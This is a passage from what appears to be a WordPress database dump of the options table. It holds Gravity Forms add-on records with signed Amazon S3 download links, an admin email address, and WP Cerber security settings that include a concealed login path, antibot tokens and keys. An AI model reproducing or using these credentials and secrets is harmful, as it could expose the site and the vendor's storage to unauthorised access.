dUZy0%3D\";s:10:\"url_latest\";s:198:\"https://s3.amazonaws.com/gravityforms/addons/paypalpaymentspro/gravityformspaypalpaymentspro_2.7.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=%2FASVgCvglfpHcxCIjhex2AdUZy0%3D\";}s:21:\"gravityformspaypalpro\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:5:\"1.8.1\";s:14:\"version_latest\";s:5:\"1.8.4\";s:3:\"url\";s:186:\"https://s3.amazonaws.com/gravityforms/addons/paypalpro/gravityformspaypalpro_1.8.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=ed%2F9CGsdX01L8t%2FtIiplZQvzfTg%3D\";s:10:\"url_latest\";s:184:\"https://s3.amazonaws.com/gravityforms/addons/paypalpro/gravityformspaypalpro_1.8.4.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=cEcXyW2ANFFYBQZ6GSzq3Tb%2BtRQ%3D\";}s:20:\"gravityformspicatcha\";a:3:{s:12:\"is_available\";b:0;s:7:\"version\";s:3:\"2.0\";s:14:\"version_latest\";s:3:\"2.0\";}s:16:\"gravityformspipe\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.2\";s:14:\"version_latest\";s:5:\"1.3.1\";s:3:\"url\";s:172:\"https://s3.amazonaws.com/gravityforms/addons/pipe/gravityformspipe_1.2.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=2rBqr3rP2bVTT3kCRA0kiKl%2FI7I%3D\";s:10:\"url_latest\";s:172:\"https://s3.amazonaws.com/gravityforms/addons/pipe/gravityformspipe_1.3.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=S9ecSW8A9ezGESM46hza4nfL1bI%3D\";}s:17:\"gravityformspolls\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"4.0\";s:14:\"version_latest\";s:5:\"4.0.1\";s:3:\"url\";s:174:\"https://s3.amazonaws.com/gravityforms/addons/polls/gravityformspolls_4.0.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=nHjVC%2BxSf7Zil742lD4bQgSEFJg%3D\";s:10:\"url_latest\";s:178:\"https://s3.amazonaws.com/gravityforms/addons/polls/gravityformspolls_4.0.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=9Jf%2BbbxnDmEdIvycmliE%2FtPXPgw%3D\";}s:20:\"gravityformspostmark\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.3\";s:14:\"version_latest\";s:3:\"1.3\";s:3:\"url\";s:180:\"https://s3.amazonaws.com/gravityforms/addons/postmark/gravityformspostmark_1.3.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=vI%2FWnSAxE0vT6QLIfrApucv1nFo%3D\";s:10:\"url_latest\";s:180:\"https://s3.amazonaws.com/gravityforms/addons/postmark/gravityformspostmark_1.3.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=vI%2FWnSAxE0vT6QLIfrApucv1nFo%3D\";}s:16:\"gravityformsppcp\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"2.5\";s:14:\"version_latest\";s:3:\"2.5\";s:3:\"url\";s:170:\"https://s3.amazonaws.com/gravityforms/addons/ppcp/gravityformsppcp_2.5.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=87tfoPHdyirFEEWZwmXfOYmIrCU%3D\";s:10:\"url_latest\";s:170:\"https://s3.amazonaws.com/gravityforms/addons/ppcp/gravityformsppcp_2.5.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=87tfoPHdyirFEEWZwmXfOYmIrCU%3D\";}s:16:\"gravityformsquiz\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"4.0\";s:14:\"version_latest\";s:3:\"4.0\";s:3:\"url\";s:170:\"https://s3.amazonaws.com/gravityforms/addons/quiz/gravityformsquiz_4.0.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=atv8NxvdbbXullUioklwUUKWyZA%3D\";s:10:\"url_latest\";s:170:\"https://s3.amazonaws.com/gravityforms/addons/quiz/gravityformsquiz_4.0.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=atv8NxvdbbXullUioklwUUKWyZA%3D\";}s:21:\"gravityformsrecaptcha\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.1\";s:14:\"version_latest\";s:5:\"1.1.2\";s:3:\"url\";s:180:\"https://s3.amazonaws.com/gravityforms/addons/recaptcha/gravityformsrecaptcha_1.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=Mu4xilQxiLvUHgG3OfPgTweTkcI%3D\";s:10:\"url_latest\";s:184:\"https://s3.amazonaws.com/gravityforms/addons/recaptcha/gravityformsrecaptcha_1.1.2.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=OQjy6b0gX0UtvkgVUPlF9k%2FB2Qo%3D\";}s:19:\"gravityformsrestapi\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:10:\"2.0-beta-2\";s:14:\"version_latest\";s:10:\"2.0-beta-2\";s:3:\"url\";s:183:\"https://s3.amazonaws.com/gravityforms/addons/restapi/gravityformsrestapi_2.0-beta-2.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=Nc6K7sGqM7AFAp8blbgE0khI8C0%3D\";s:10:\"url_latest\";s:183:\"https://s3.amazonaws.com/gravityforms/addons/restapi/gravityformsrestapi_2.0-beta-2.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=Nc6K7sGqM7AFAp8blbgE0khI8C0%3D\";}s:20:\"gravityformssendgrid\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.5\";s:14:\"version_latest\";s:3:\"1.5\";s:3:\"url\";s:178:\"https://s3.amazonaws.com/gravityforms/addons/sendgrid/gravityformssendgrid_1.5.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=auhJLZQ5lOmrzLfR10Rvqsv5X2s%3D\";s:10:\"url_latest\";s:178:\"https://s3.amazonaws.com/gravityforms/addons/sendgrid/gravityformssendgrid_1.5.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=auhJLZQ5lOmrzLfR10Rvqsv5X2s%3D\";}s:21:\"gravityformssignature\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"4.4\";s:14:\"version_latest\";s:5:\"4.4.1\";s:3:\"url\";s:184:\"https://s3.amazonaws.com/gravityforms/addons/signature/gravityformssignature_4.4.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=HcPGq%2BDqQz2Q72BhVzQLS4e%2Bee0%3D\";s:10:\"url_latest\";s:184:\"https://s3.amazonaws.com/gravityforms/addons/signature/gravityformssignature_4.4.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=t2ImOZoe1tRYi1PUhITv8Ed%2BvGU%3D\";}s:17:\"gravityformsslack\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"2.0\";s:14:\"version_latest\";s:5:\"2.0.1\";s:3:\"url\";s:174:\"https://s3.amazonaws.com/gravityforms/addons/slack/gravityformsslack_2.0.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=ITy1yXw7USXzwyTC275xsZ%2BH2o8%3D\";s:10:\"url_latest\";s:174:\"https://s3.amazonaws.com/gravityforms/addons/slack/gravityformsslack_2.0.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=OPBq4WdR1N60qYfUBtXrKBwX05g%3D\";}s:18:\"gravityformssquare\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.8\";s:14:\"version_latest\";s:5:\"1.8.1\";s:3:\"url\";s:174:\"https://s3.amazonaws.com/gravityforms/addons/square/gravityformssquare_1.8.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=NG8MQFqB2xmEDOkJ2uYxC20vvkk%3D\";s:10:\"url_latest\";s:180:\"https://s3.amazonaws.com/gravityforms/addons/square/gravityformssquare_1.8.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=2npcbO%2FRQqYPwX%2FnRq9EuKsmaHk%3D\";}s:18:\"gravityformsstripe\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"4.3\";s:14:\"version_latest\";s:3:\"4.3\";s:3:\"url\";s:174:\"https://s3.amazonaws.com/gravityforms/addons/stripe/gravityformsstripe_4.3.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=qx0khrDuY51nm2bL3Vlj7r50PnE%3D\";s:10:\"url_latest\";s:174:\"https://s3.amazonaws.com/gravityforms/addons/stripe/gravityformsstripe_4.3.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=qx0khrDuY51nm2bL3Vlj7r50PnE%3D\";}s:18:\"gravityformssurvey\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"3.8\";s:14:\"version_latest\";s:3:\"3.8\";s:3:\"url\";s:176:\"https://s3.amazonaws.com/gravityforms/addons/survey/gravityformssurvey_3.8.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=d%2FXJmQtwDV5RWzErqevreYynCrk%3D\";s:10:\"url_latest\";s:176:\"https://s3.amazonaws.com/gravityforms/addons/survey/gravityformssurvey_3.8.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=d%2FXJmQtwDV5RWzErqevreYynCrk%3D\";}s:18:\"gravityformstrello\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"2.0\";s:14:\"version_latest\";s:5:\"2.0.1\";s:3:\"url\";s:174:\"https://s3.amazonaws.com/gravityforms/addons/trello/gravityformstrello_2.0.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=Wdir2YmYftmQ4W46Ml2wBje8yGA%3D\";s:10:\"url_latest\";s:182:\"https://s3.amazonaws.com/gravityforms/addons/trello/gravityformstrello_2.0.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=YeDGTE%2FqacnvIKD%2F%2BHkVoBnj6Dg%3D\";}s:18:\"gravityformstwilio\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"2.9\";s:14:\"version_latest\";s:5:\"2.9.1\";s:3:\"url\";s:178:\"https://s3.amazonaws.com/gravityforms/addons/twilio/gravityformstwilio_2.9.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=kPH0%2FhtlOE%2F6DFFzXCf2MvBSLtc%3D\";s:10:\"url_latest\";s:178:\"https://s3.amazonaws.com/gravityforms/addons/twilio/gravityformstwilio_2.9.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=gz7zMKhqEqbtqyiR4q4Gn7tA7%2Fk%3D\";}s:28:\"gravityformsuserregistration\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"5.1\";s:14:\"version_latest\";s:3:\"5.1\";s:3:\"url\";s:196:\"https://s3.amazonaws.com/gravityforms/addons/userregistration/gravityformsuserregistration_5.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=MYLW5j%2FhiLSFduo4utBmPXQBJu0%3D\";s:10:\"url_latest\";s:196:\"https://s3.amazonaws.com/gravityforms/addons/userregistration/gravityformsuserregistration_5.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=MYLW5j%2FhiLSFduo4utBmPXQBJu0%3D\";}s:20:\"gravityformswebhooks\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.5\";s:14:\"version_latest\";s:3:\"1.5\";s:3:\"url\";s:180:\"https://s3.amazonaws.com/gravityforms/addons/webhooks/gravityformswebhooks_1.5.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=lKgjfApqkWS9SVL%2FjRlKA3euUnE%3D\";s:10:\"url_latest\";s:180:\"https://s3.amazonaws.com/gravityforms/addons/webhooks/gravityformswebhooks_1.5.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=lKgjfApqkWS9SVL%2FjRlKA3euUnE%3D\";}s:18:\"gravityformszapier\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"4.2\";s:14:\"version_latest\";s:5:\"4.2.1\";s:3:\"url\";s:174:\"https://s3.amazonaws.com/gravityforms/addons/zapier/gravityformszapier_4.2.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=6dMBYfN1KDeI1wX30YiyN1DjjMw%3D\";s:10:\"url_latest\";s:178:\"https://s3.amazonaws.com/gravityforms/addons/zapier/gravityformszapier_4.2.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=IGutV5Noc9JHbNa%2BpKsy1ImqX88%3D\";}s:19:\"gravityformszohocrm\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"2.0\";s:14:\"version_latest\";s:5:\"2.0.1\";s:3:\"url\";s:176:\"https://s3.amazonaws.com/gravityforms/addons/zohocrm/gravityformszohocrm_2.0.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=HPJ6GSRYWYYGmrRwtIdmVZDUFLo%3D\";s:10:\"url_latest\";s:180:\"https://s3.amazonaws.com/gravityforms/addons/zohocrm/gravityformszohocrm_2.0.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=yIlbME6zM2I1ERWPf0%2B6Ys3ofek%3D\";}}','no'),(1740,'WPLANG','','yes'),(1741,'new_admin_email','terra@smcorridornews.com','yes'),(3616,'et_support_site_id','#S7k3i5tD0rO*gcQhKuE','yes'),(2000,'theme_mods_twentytwentyone','a:4:{i:0;b:0;s:18:\"nav_menu_locations\";a:2:{s:7:\"primary\";i:4;s:6:\"footer\";i:4;}s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1677859691;s:4:\"data\";a:2:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:5:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";i:3;s:7:\"block-5\";i:4;s:7:\"block-6\";}}}s:18:\"custom_css_post_id\";i:-1;}','yes'),(11295,'custom-css-js-tree','a:0:{}','yes'),(14295,'et_divi_builder_global_presets_history_ng','O:8:\"stdClass\":2:{s:7:\"history\";a:1:{i:0;O:8:\"stdClass\":3:{s:8:\"settings\";O:8:\"stdClass\":1:{s:13:\"et_pb_section\";O:8:\"stdClass\":2:{s:7:\"presets\";O:8:\"stdClass\":1:{s:8:\"_initial\";O:8:\"stdClass\":5:{s:4:\"name\";s:16:\"Section Preset 1\";s:7:\"created\";i:0;s:7:\"updated\";i:0;s:7:\"version\";s:6:\"4.20.2\";s:8:\"settings\";O:8:\"stdClass\":0:{}}}s:7:\"default\";s:8:\"_initial\";}}s:4:\"time\";i:1679860261466;s:5:\"label\";s:26:\"Preset Deleted For Section\";}}s:5:\"index\";s:1:\"0\";}','no'),(14300,'layout_category_children','a:0:{}','yes'),(9954,'gfpdf_is_installed','1','yes'),(9955,'gfpdf_settings','a:1:{s:21:\"background_processing\";s:2:\"No\";}','yes'),(165,'can_compress_scripts','1','no'),(189,'cerber-groove','3Xd7pgGiTFve0fkR','no'),(171,'_cerber_db_errors','a:10:{i:0;a:3:{i:0;s:65:\"ERROR 1146: Table \'corrid11_wp709.wpfi_cerber_sets\' doesn\'t exist\";i:1;s:75:\"SELECT * FROM wpfi_cerber_sets WHERE the_key = \"_nexus_mode\" AND the_id = 0\";i:2;d:1677496788.653502941131591796875;}i:1;a:3:{i:0;s:65:\"ERROR 1146: Table \'corrid11_wp709.wpfi_cerber_sets\' doesn\'t exist\";i:1;s:75:\"SELECT * FROM wpfi_cerber_sets WHERE the_key = \"_cerberkey_\" AND the_id = 0\";i:2;d:1677496788.653585910797119140625;}i:2;a:3:{i:0;s:65:\"ERROR 1146: Table \'corrid11_wp709.wpfi_cerber_sets\' doesn\'t exist\";i:1;s:75:\"SELECT * FROM wpfi_cerber_sets WHERE the_key = \"_cerberkey_\" AND the_id = 0\";i:2;d:1677496788.653708934783935546875;}i:3;a:3:{i:0;s:65:\"ERROR 1146: Table \'corrid11_wp709.wpfi_cerber_sets\' doesn\'t exist\";i:1;s:219:\"INSERT INTO wpfi_cerber_sets (the_key, the_id, the_value, expires) VALUES (\"_cerberkey_\",0,\"a:3:{i:0;s:32:\\\"df6937e40bdccb130694428a2fd46695\\\";i:1;i:1677496788;i:4;s:40:\\\"SK//071QZBVCUG364E85JIMOYXL29PAHKSWDRTNF\\\";}\",0)\";i:2;d:1677496788.653789997100830078125;}i:4;a:3:{i:0;s:65:\"ERROR 1146: Table \'corrid11_wp709.wpfi_cerber_sets\' doesn\'t exist\";i:1;s:76:\"SELECT * FROM wpfi_cerber_sets WHERE the_key = \"admin_notice\" AND the_id = 0\";i:2;d:1677496788.67360591888427734375;}i:5;a:3:{i:0;s:65:\"ERROR 1146: Table \'corrid11_wp709.wpfi_cerber_sets\' doesn\'t exist\";i:1;s:103:\"INSERT INTO wpfi_cerber_sets (the_key, the_id, the_value, expires) VALUES (\"admin_notice\",0,\"a:0:{}\",0)\";i:2;d:1677496788.673676013946533203125;}i:6;a:3:{i:0;s:65:\"ERROR 1146: Table \'corrid11_wp709.wpfi_cerber_sets\' doesn\'t exist\";i:1;s:77:\"SELECT * FROM wpfi_cerber_sets WHERE the_key = \"admin_message\" AND the_id = 0\";i:2;d:1677496788.67372798919677734375;}i:7;a:3:{i:0;s:65:\"ERROR 1146: Table \'corrid11_wp709.wpfi_cerber_sets\' doesn\'t exist\";i:1;s:104:\"INSERT INTO wpfi_cerber_sets (the_key, the_id, the_value, expires) VALUES (\"admin_message\",0,\"a:0:{}\",0)\";i:2;d:1677496788.673778057098388671875;}i:8;a:3:{i:0;s:65:\"ERROR 1146: Table \'corrid11_wp709.wpfi_cerber_sets\' doesn\'t exist\";i:1;s:81:\"SELECT * FROM wpfi_cerber_sets WHERE the_key = \"cerber_admin_wide\" AND the_id = 0\";i:2;d:1677496788.6738269329071044921875;}i:9;a:3:{i:0;s:65:\"ERROR 1146: Table \'corrid11_wp709.wpfi_cerber_sets\' doesn\'t exist\";i:1;s:102:\"INSERT INTO wpfi_cerber_sets (the_key, the_id, the_value, expires) VALUES (\"cerber_admin_wide\",0,\"\",0)\";i:2;d:1677496788.6738770008087158203125;}}','no'),(172,'cerber-antibot','a:2:{i:0;a:2:{i:0;a:2:{i:0;s:8:\"CwsgLdXJ\";i:1;s:11:\"0pnoSjqKUAI\";}i:1;a:2:{i:0;s:11:\"-aMmIJoxdqt\";i:1;s:6:\"erjEoc\";}}i:1;a:4:{i:0;a:2:{i:0;s:10:\"ciYtxCbOMD\";i:1;s:11:\"q_S*Cfs4ruV\";}i:1;a:2:{i:0;s:13:\"OVxlMvJWhdQwp\";i:1;s:9:\"inP5CdDeO\";}i:2;a:2:{i:0;s:11:\"HEoXJ-cIWKs\";i:1;s:14:\"n6qW8[CzUgoGEe\";}i:3;a:2:{i:0;s:12:\"ofnBeTPRphrM\";i:1;s:16:\"XD5iWxZm7KtypMQj\";}}}','no'),(173,'cerber-main','a:39:{s:9:\"boot-mode\";s:1:\"0\";s:8:\"attempts\";s:1:\"2\";s:6:\"period\";s:2:\"30\";s:7:\"lockout\";s:2:\"60\";s:8:\"agperiod\";s:2:\"24\";s:7:\"aglocks\";s:1:\"2\";s:6:\"aglast\";s:1:\"4\";s:10:\"limitwhite\";s:0:\"\";s:11:\"nologinhint\";s:0:\"\";s:15:\"nologinhint_msg\";s:0:\"\";s:10:\"nopasshint\";s:0:\"\";s:14:\"nopasshint_msg\";s:0:\"\";s:11:\"nologinlang\";s:0:\"\";s:5:\"proxy\";s:0:\"\";s:10:\"cookiepref\";s:0:\"\";s:6:\"subnet\";s:0:\"\";s:8:\"nonusers\";s:0:\"\";s:7:\"wplogin\";s:0:\"\";s:10:\"noredirect\";s:0:\"\";s:7:\"page404\";s:1:\"0\";s:9:\"loginpath\";s:13:\"the-wild-hunt\";s:9:\"loginnowp\";s:1:\"0\";s:13:\"logindeferred\";s:0:\"\";s:10:\"citadel_on\";s:1:\"1\";s:7:\"cilimit\";s:3:\"200\";s:8:\"ciperiod\";s:2:\"15\";s:10:\"ciduration\";s:2:\"60\";s:8:\"cinotify\";s:0:\"\";s:7:\"keeplog\";s:2:\"30\";s:12:\"keeplog_auth\";s:2:\"30\";s:8:\"ip_extra\";s:0:\"\";s:9:\"cerberlab\";s:1:\"1\";s:11:\"cerberproto\";s:1:\"0\";s:7:\"usefile\";s:0:\"\";s:10:\"dateformat\";s:0:\"\";s:10:\"plain_date\";s:0:\"\";s:10:\"admin_lang\";s:0:\"\";s:14:\"top_admin_menu\";s:0:\"\";s:14:\"no_white_my_ip\";s:0:\"\";}','no'),(174,'cerber-hardening','a:14:{s:8:\"stopenum\";s:0:\"\";s:15:\"stopenum_oembed\";s:0:\"\";s:16:\"stopenum_sitemap\";i:0;s:8:\"adminphp\";i:0;s:8:\"phpnoupl\";i:0;s:8:\"nophperr\";s:0:\"\";s:6:\"xmlrpc\";i:0;s:7:\"nofeeds\";i:0;s:10:\"norestuser\";s:0:\"\";s:6:\"norest\";i:0;s:8:\"restauth\";s:0:\"\";s:9:\"restroles\";a:1:{i:0;s:13:\"administrator\";}s:9:\"restwhite\";a:2:{i:0;s:6:\"oembed\";i:1;s:14:\"wp-site-health\";}s:9:\"cleanhead\";s:0:\"\";}','no'),(175,'cerber-users','a:19:{s:8:\"authonly\";i:0;s:11:\"authonlyacl\";i:0;s:11:\"authonlymsg\";s:68:\"Only registered and logged in users are allowed to view this website\";s:13:\"authonlyredir\";s:0:\"\";s:8:\"regwhite\";i:0;s:12:\"regwhite_msg\";s:0:\"\";s:12:\"reglimit_num\";i:3;s:12:\"reglimit_min\";i:60;s:6:\"emrule\";i:0;s:6:\"emlist\";a:0:{}s:10:\"prohibited\";a:0:{}s:7:\"app_pwd\";s:0:\"\";s:11:\"auth_expire\";s:0:\"\";s:8:\"usersort\";s:0:\"\";s:11:\"pdata_erase\";i:0;s:14:\"pdata_sessions\";i:0;s:12:\"pdata_export\";i:0;s:9:\"pdata_act\";i:0;s:9:\"pdata_trf\";a:0:{}}','no'),(176,'cerber-antispam','a:11:{s:8:\"botscomm\";s:0:\"\";s:7:\"botsreg\";i:0;s:7:\"botsany\";i:0;s:8:\"botssafe\";i:0;s:10:\"botsnoauth\";s:0:\"\";s:11:\"botsipwhite\";s:1:\"1\";s:10:\"customcomm\";i:0;s:9:\"botswhite\";a:0:{}s:8:\"spamcomm\";i:0;s:10:\"trashafter\";i:7;s:18:\"trashafter-enabled\";i:0;}','no'),(177,'cerber-recaptcha','a:15:{s:7:\"sitekey\";s:0:\"\";s:9:\"secretkey\";s:0:\"\";s:9:\"invirecap\";i:0;s:10:\"recaplogin\";i:0;s:9:\"recaplost\";i:0;s:8:\"recapreg\";i:0;s:13:\"recapwoologin\";i:0;s:12:\"recapwoolost\";i:0;s:11:\"recapwooreg\";i:0;s:8:\"recapcom\";i:0;s:12:\"recapcomauth\";s:0:\"\";s:12:\"recapipwhite\";i:0;s:16:\"recaptcha-period\";i:60;s:16:\"recaptcha-number\";i:3;s:16:\"recaptcha-within\";i:30;}','no'),(178,'cerber-notifications','a:26:{s:6:\"notify\";s:0:\"\";s:5:\"above\";i:5;s:5:\"email\";a:0:{}s:9:\"emailrate\";i:12;s:14:\"notify-new-ver\";s:1:\"1\";s:10:\"email_mask\";i:0;s:12:\"email_format\";i:0;s:8:\"use_smtp\";i:0;s:9:\"smtp_host\";s:0:\"\";s:9:\"smtp_port\";s:3:\"587\";s:9:\"smtp_encr\";s:3:\"tls\";s:8:\"smtp_pwd\";s:0:\"\";s:9:\"smtp_user\";s:0:\"\";s:9:\"smtp_from\";s:0:\"\";s:14:\"smtp_from_name\";s:9:\"WP Cerber\";s:7:\"pbtoken\";s:0:\"\";s:8:\"pbdevice\";s:0:\"\";s:6:\"pbrate\";s:0:\"\";s:8:\"pbnotify\";i:10;s:16:\"pbnotify-enabled\";s:0:\"\";s:7:\"pb_mask\";i:0;s:9:\"pb_format\";i:0;s:12:\"wreports-day\";s:1:\"1\";s:13:\"wreports-time\";i:9;s:12:\"email-report\";a:0:{}s:13:\"enable-report\";s:1:\"1\";}','no'),(179,'cerber-traffic','a:22:{s:9:\"tienabled\";s:1:\"1\";s:9:\"tiipwhite\";i:0;s:7:\"tiwhite\";a:0:{}s:8:\"tierrmon\";s:1:\"1\";s:11:\"tierrnoauth\";s:0:\"\";s:6:\"timode\";s:1:\"3\";s:12:\"tilogrestapi\";i:0;s:11:\"tilogxmlrpc\";i:0;s:9:\"tinocrabs\";s:1:\"1\";s:8:\"tinolocs\";a:0:{}s:6:\"tinoua\";a:0:{}s:8:\"tifields\";i:0;s:6:\"timask\";a:0:{}s:6:\"tihdrs\";i:0;s:11:\"tihdrs_sent\";i:0;s:6:\"tisenv\";i:0;s:7:\"ticandy\";i:0;s:12:\"ticandy_sent\";i:0;s:8:\"tiphperr\";i:0;s:11:\"tithreshold\";s:0:\"\";s:9:\"tikeeprec\";i:30;s:14:\"tikeeprec_auth\";i:30;}','no'),(180,'cerber-user_shield','a:9:{s:7:\"ds_4acc\";i:0;s:13:\"ds_regs_roles\";a:0:{}s:10:\"ds_add_acc\";a:1:{i:0;s:13:\"administrator\";}s:11:\"ds_edit_acc\";a:1:{i:0;s:13:\"administrator\";}s:11:\"ds_4acc_acl\";i:0;s:9:\"ds_4roles\";i:0;s:11:\"ds_add_role\";a:1:{i:0;s:13:\"administrator\";}s:12:\"ds_edit_role\";a:1:{i:0;s:13:\"administrator\";}s:13:\"ds_4roles_acl\";i:0;}','no'),(181,'cerber-opt_shield','a:4:{s:8:\"ds_4opts\";i:0;s:14:\"ds_4opts_roles\";a:1:{i:0;s:13:\"administrator\";}s:13:\"ds_4opts_list\";a:7:{s:11:\"admin_email\";i:1;s:12:\"default_role\";i:1;s:4:\"home\";i:1;s:7:\"siteurl\";i:1;s:18:\"users_can_register\";i:1;s:14:\"active_plugins\";i:1;s:8:\"template\";i:1;}s:12:\"ds_4opts_acl\";i:0;}','no'),(182,'cerber-scanner','a:10:{s:8:\"scan_cpt\";a:0:{}s:9:\"scan_uext\";a:3:{i:0;s:3:\"tmp\";i:1;s:4:\"temp\";i:2;s:3:\"bak\";}s:12:\"scan_exclude\";a:0:{}s:9:\"scan_inew\";s:1:\"1\";s:9:\"scan_imod\";s:1:\"1\";s:10:\"scan_chmod\";i:0;s:8:\"scan_tmp\";i:0;s:9:\"scan_sess\";i:0;s:10:\"scan_debug\";i:0;s:13:\"scan_qcleanup\";s:2:\"30\";}','no'),(183,'cerber-schedule','a:8:{s:11:\"scan_aquick\";i:0;s:10:\"scan_afull\";s:5:\"05:00\";s:18:\"scan_afull-enabled\";i:0;s:10:\"scan_reinc\";a:5:{i:3;i:1;i:4;i:1;i:15;i:1;i:50;i:1;i:51;i:1;}s:12:\"scan_relimit\";i:3;s:10:\"scan_isize\";i:0;s:12:\"scan_ierrors\";i:0;s:10:\"email-scan\";a:0:{}}','no'),(184,'cerber-policies','a:12:{s:13:\"scan_delunatt\";i:0;s:11:\"scan_delupl\";a:0:{}s:14:\"scan_delunwant\";i:0;s:15:\"scan_recover_wp\";i:0;s:15:\"scan_recover_pl\";i:0;s:10:\"scan_media\";i:0;s:15:\"scan_skip_media\";a:14:{i:0;s:3:\"css\";i:1;s:3:\"jpg\";i:2;s:4:\"jpeg\";i:3;s:3:\"jpe\";i:4;s:3:\"gif\";i:5;s:3:\"png\";i:6;s:3:\"bmp\";i:7;s:3:\"tif\";i:8;s:4:\"tiff\";i:9;s:3:\"ico\";i:10;s:4:\"woff\";i:11;s:5:\"woff2\";i:12;s:3:\"eot\";i:13;s:3:\"ttf\";}s:14:\"scan_del_media\";a:5:{i:0;s:3:\"php\";i:1;s:2:\"js\";i:2;s:3:\"htm\";i:3;s:4:\"html\";i:4;s:5:\"shtml\";}s:14:\"scan_nodeltemp\";i:0;s:14:\"scan_nodelsess\";i:0;s:13:\"scan_delexdir\";a:0:{}s:13:\"scan_delexext\";a:0:{}}','no'),(185,'cerber-nexus_master','a:7:{s:13:\"master_tolist\";s:0:\"\";s:13:\"master_swshow\";s:0:\"\";s:14:\"master_at_site\";s:0:\"\";s:13:\"master_locale\";i:0;s:9:\"master_dt\";i:0;s:9:\"master_tz\";i:0;s:11:\"master_diag\";i:0;}','no'),(186,'cerber-nexus-slave','a:3:{s:9:\"slave_ips\";s:0:\"\";s:12:\"slave_access\";i:2;s:10: